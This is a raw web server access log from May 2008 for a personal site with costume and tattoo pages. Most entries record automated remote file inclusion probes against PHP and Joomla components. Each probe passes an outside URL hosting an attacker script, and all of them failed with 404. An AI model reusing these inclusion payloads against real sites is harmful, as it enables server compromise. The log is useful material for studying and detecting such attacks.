87.101.4.42 - - [10/May/2008:16:21:37 -0500] "GET /logs/include.php?path[docroot]=http://www.guardmusic.com/echo.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
87.101.4.42 - - [10/May/2008:16:21:37 -0500] "GET /include.php?path[docroot]=http://www.guardmusic.com/echo.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
72.27.168.145 - - [10/May/2008:16:21:43 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://www.google.com/search?hl=en&client=firefox-a&channel=s&rls=org.mozilla%3Aen-US%3Aofficial&q=costume+designer&btnG=Search""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
64.242.234.146 - - [10/May/2008:16:27:48 -0500] "GET /logs//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
64.242.234.146 - - [10/May/2008:16:27:48 -0500] "GET //content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
74.6.19.27 - - [10/May/2008:16:31:22 -0500] "GET /logs/access_log.1171756800 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
213.198.59.92 - - [10/May/2008:16:31:51 -0500] "GET /logs/access_log.1207008000//Neos_Chronos/header.php?base_folder=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
213.198.59.92 - - [10/May/2008:16:31:51 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
213.198.59.92 - - [10/May/2008:16:31:51 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
84.19.178.201 - - [10/May/2008:16:32:24 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://fuckerboy.t35.com/id2.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
84.19.178.201 - - [10/May/2008:16:32:25 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://fuckerboy.t35.com/id2.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
209.216.203.6 - - [10/May/2008:16:33:42 -0500] "GET /logs//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
209.216.203.6 - - [10/May/2008:16:33:42 -0500] "GET //content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
65.55.208.130 - - [10/May/2008:16:34:02 -0500] "GET /artwork/furniture-motto-line.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.6.26.250 - - [10/May/2008:16:37:40 -0500] "GET /logs/access_log.1203120000 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
213.198.59.92 - - [10/May/2008:16:40:23 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
209.216.203.6 - - [10/May/2008:16:40:47 -0500] "GET /logs//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
209.216.203.6 - - [10/May/2008:16:40:48 -0500] "GET //content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
67.228.60.242 - - [10/May/2008:16:43:11 -0500] "GET /logs/access_log.1207180800//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
67.228.60.242 - - [10/May/2008:16:43:11 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
67.228.60.242 - - [10/May/2008:16:43:11 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
67.228.60.242 - - [10/May/2008:16:43:16 -0500] "GET /logs/access_log.1207180800//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
67.228.60.242 - - [10/May/2008:16:43:16 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
67.228.60.242 - - [10/May/2008:16:43:16 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
203.72.181.15 - - [10/May/2008:16:43:30 -0500] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
203.72.181.15 - - [10/May/2008:16:43:36 -0500] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
203.72.181.15 - - [10/May/2008:16:43:39 -0500] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
203.72.181.15 - - [10/May/2008:16:43:44 -0500] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
62.178.28.13 - - [10/May/2008:16:54:46 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
62.178.28.13 - - [10/May/2008:16:54:46 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
65.11.77.48 - - [10/May/2008:16:59:15 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_design""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
65.11.77.48 - - [10/May/2008:16:59:23 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
65.11.77.48 - - [10/May/2008:16:59:23 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
65.11.77.48 - - [10/May/2008:16:59:24 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
65.11.77.48 - - [10/May/2008:16:59:24 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
211.20.85.150 - - [10/May/2008:17:03:48 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
203.72.181.15 - - [10/May/2008:17:06:14 -0500] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ieras.ru/tmp/aid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
203.72.181.15 - - [10/May/2008:17:06:20 -0500] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ieras.ru/tmp/aid.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
195.93.200.156 - - [10/May/2008:17:24:45 -0500] "GET /logs/access_log.1178668800//index.php?option=com_weblinks&Itemid=20&mosConfig_absolute_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
195.93.200.156 - - [10/May/2008:17:24:45 -0500] "GET //index.php?option=com_weblinks&Itemid=20&mosConfig_absolute_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.93.200.156 - - [10/May/2008:17:24:45 -0500] "GET /logs//index.php?option=com_weblinks&Itemid=20&mosConfig_absolute_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
208.100.17.158 - - [10/May/2008:17:29:48 -0500] "GET /logs/access_log.1207180800//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
208.100.17.158 - - [10/May/2008:17:29:48 -0500] "GET //content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
208.100.17.158 - - [10/May/2008:17:29:48 -0500] "GET /logs//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
208.100.17.158 - - [10/May/2008:17:29:54 -0500] "GET /logs/access_log.1207180800//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
208.100.17.158 - - [10/May/2008:17:29:54 -0500] "GET //content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
208.100.17.158 - - [10/May/2008:17:29:54 -0500] "GET /logs//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
67.59.151.227 - - [10/May/2008:17:29:56 -0500] "GET /logs/access_log.1207180800//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
67.59.151.227 - - [10/May/2008:17:29:56 -0500] "GET //content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
67.59.151.227 - - [10/May/2008:17:29:56 -0500] "GET /logs//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
89.255.3.207 - - [10/May/2008:17:33:27 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://fadhilla.com/idnews.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
89.255.3.207 - - [10/May/2008:17:33:27 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://fadhilla.com/idnews.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
89.255.3.207 - - [10/May/2008:17:33:27 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://fadhilla.com/idnews.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
89.255.3.207 - - [10/May/2008:17:33:27 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://fadhilla.com/idnews.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
74.6.24.27 - - [10/May/2008:17:36:07 -0500] "GET /logs/access_log.1206316800 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.47.201.117 - - [10/May/2008:17:40:34 -0500] "GET /logs/access_log.1207180800//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
72.47.201.117 - - [10/May/2008:17:40:34 -0500] "GET //content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
72.47.201.117 - - [10/May/2008:17:40:35 -0500] "GET /logs//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
64.242.234.146 - - [10/May/2008:17:45:59 -0500] "GET /logs/access_log.1207180800//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
64.242.234.146 - - [10/May/2008:17:45:59 -0500] "GET //content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
64.242.234.146 - - [10/May/2008:17:45:59 -0500] "GET /logs//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
85.17.138.13 - - [10/May/2008:17:46:26 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.i-promo.info/test.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
74.6.27.56 - - [10/May/2008:17:47:31 -0500] "GET /logs/access_log.1189209600 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
81.169.139.91 - - [10/May/2008:17:47:32 -0500] "GET /logs/access_log.1207180800//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.803"
81.169.139.91 - - [10/May/2008:17:47:33 -0500] "GET //content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
81.169.139.91 - - [10/May/2008:17:47:33 -0500] "GET /logs//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
213.92.118.223 - - [10/May/2008:17:49:37 -0500] "GET /logs/access_log.1207180800//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
213.92.118.223 - - [10/May/2008:17:49:38 -0500] "GET //content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
213.92.118.223 - - [10/May/2008:17:49:38 -0500] "GET /logs//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
70.85.200.98 - - [10/May/2008:17:51:35 -0500] "GET /logs/access_log.1207180800//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.810"
70.85.200.98 - - [10/May/2008:17:51:35 -0500] "GET //content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
70.85.200.98 - - [10/May/2008:17:51:35 -0500] "GET /logs//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
74.6.20.95 - - [10/May/2008:17:52:36 -0500] "GET /logs/access_log.1168387200 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.26.179 - - [10/May/2008:17:56:33 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
58.26.137.64 - - [10/May/2008:17:58:51 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.69"
58.26.137.64 - - [10/May/2008:17:58:52 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.69"
189.38.50.24 - - [10/May/2008:17:59:59 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
189.38.50.24 - - [10/May/2008:18:00:00 -0500] "GET //skin/zero_vote/error.php?dir=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
58.26.137.64 - - [10/May/2008:18:02:14 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.69"
58.26.137.64 - - [10/May/2008:18:02:14 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.69"
213.92.118.223 - - [10/May/2008:18:02:49 -0500] "GET /logs/access_log.1207180800//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
213.92.118.223 - - [10/May/2008:18:02:49 -0500] "GET //content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
213.92.118.223 - - [10/May/2008:18:02:49 -0500] "GET /logs//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
195.155.232.37 - - [10/May/2008:18:11:30 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
195.155.232.37 - - [10/May/2008:18:11:31 -0500] "GET //Neos_Chronos/header.php?base_folder=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
68.184.134.85 - - [10/May/2008:18:12:51 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)"
68.184.134.85 - - [10/May/2008:18:12:51 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)"
68.184.134.85 - - [10/May/2008:18:12:51 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)"
68.184.134.85 - - [10/May/2008:18:12:51 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)"
80.241.172.8 - - [10/May/2008:18:13:00 -0500] "GET /logs/access_log.1207180800//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
80.241.172.8 - - [10/May/2008:18:13:00 -0500] "GET //content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
80.241.172.8 - - [10/May/2008:18:13:00 -0500] "GET /logs//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
80.241.172.8 - - [10/May/2008:18:13:05 -0500] "GET /logs/access_log.1207180800//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
80.241.172.8 - - [10/May/2008:18:13:05 -0500] "GET //content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
80.241.172.8 - - [10/May/2008:18:13:06 -0500] "GET /logs//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
68.184.134.85 - - [10/May/2008:18:13:33 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)"
87.106.31.145 - - [10/May/2008:18:20:15 -0500] "GET /logs//spaw_control.class.php?spaw_root=http://www.guardmusic.com/echo.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
87.106.31.145 - - [10/May/2008:18:20:16 -0500] "GET //spaw_control.class.php?spaw_root=http://www.guardmusic.com/echo.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
209.216.203.6 - - [10/May/2008:18:21:23 -0500] "GET /logs/access_log.1207180800//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.65"
209.216.203.6 - - [10/May/2008:18:21:24 -0500] "GET //content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
209.216.203.6 - - [10/May/2008:18:21:24 -0500] "GET /logs//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
209.216.203.6 - - [10/May/2008:18:21:28 -0500] "GET /logs/access_log.1207180800//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.65"
209.216.203.6 - - [10/May/2008:18:21:29 -0500] "GET //content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
209.216.203.6 - - [10/May/2008:18:21:29 -0500] "GET /logs//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
195.155.232.37 - - [10/May/2008:18:22:25 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
195.155.232.37 - - [10/May/2008:18:22:26 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
195.155.232.37 - - [10/May/2008:18:29:10 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
195.155.232.37 - - [10/May/2008:18:29:10 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
70.85.200.98 - - [10/May/2008:18:29:12 -0500] "GET /logs/access_log.1207180800//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.810"
70.85.200.98 - - [10/May/2008:18:29:12 -0500] "GET //content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
70.85.200.98 - - [10/May/2008:18:29:12 -0500] "GET /logs//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
74.6.24.252 - - [10/May/2008:18:29:53 -0500] "GET /logs/access_log.1154736000 HTTP/1.0" 200 129126 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
211.20.85.150 - - [10/May/2008:18:52:01 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
74.6.21.99 - - [10/May/2008:18:54:49 -0500] "GET /logs/access_log.1204934400 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.109.18.92 - - [10/May/2008:18:55:12 -0500] "GET /logs//login.php?dir=http://220-133-170-132.hinet-ip.hinet.net/appserv/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
66.109.18.92 - - [10/May/2008:18:55:13 -0500] "GET //login.php?dir=http://220-133-170-132.hinet-ip.hinet.net/appserv/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
81.16.171.9 - - [10/May/2008:18:55:54 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
81.16.171.9 - - [10/May/2008:18:55:54 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.79"